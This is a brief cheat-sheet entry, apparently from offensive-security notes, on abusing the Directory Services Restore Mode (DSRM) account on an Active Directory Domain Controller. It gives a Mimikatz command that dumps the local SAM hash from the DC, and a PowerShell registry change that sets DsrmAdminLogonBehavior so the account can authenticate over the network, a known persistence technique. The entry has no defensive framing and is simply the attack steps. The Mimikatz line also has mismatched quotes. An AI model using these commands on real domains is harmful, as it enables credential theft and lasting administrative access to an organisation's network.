DSRM #
Get the hash of the DSRM. That account can exclusively log in locally on the DC, so we have to change the logon type for it by modifying a registry key.
Dump the hash from the Domain Controller
Invoke-Mimikatz -Command '"token::elevate" lsadump::sam"' -Computername <DC>
First, remote to the DC using a PowerShell session elevated as Domain Admin.
Change logon behavior in the registry, to allow authentication to the Domain Controller over the network.
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD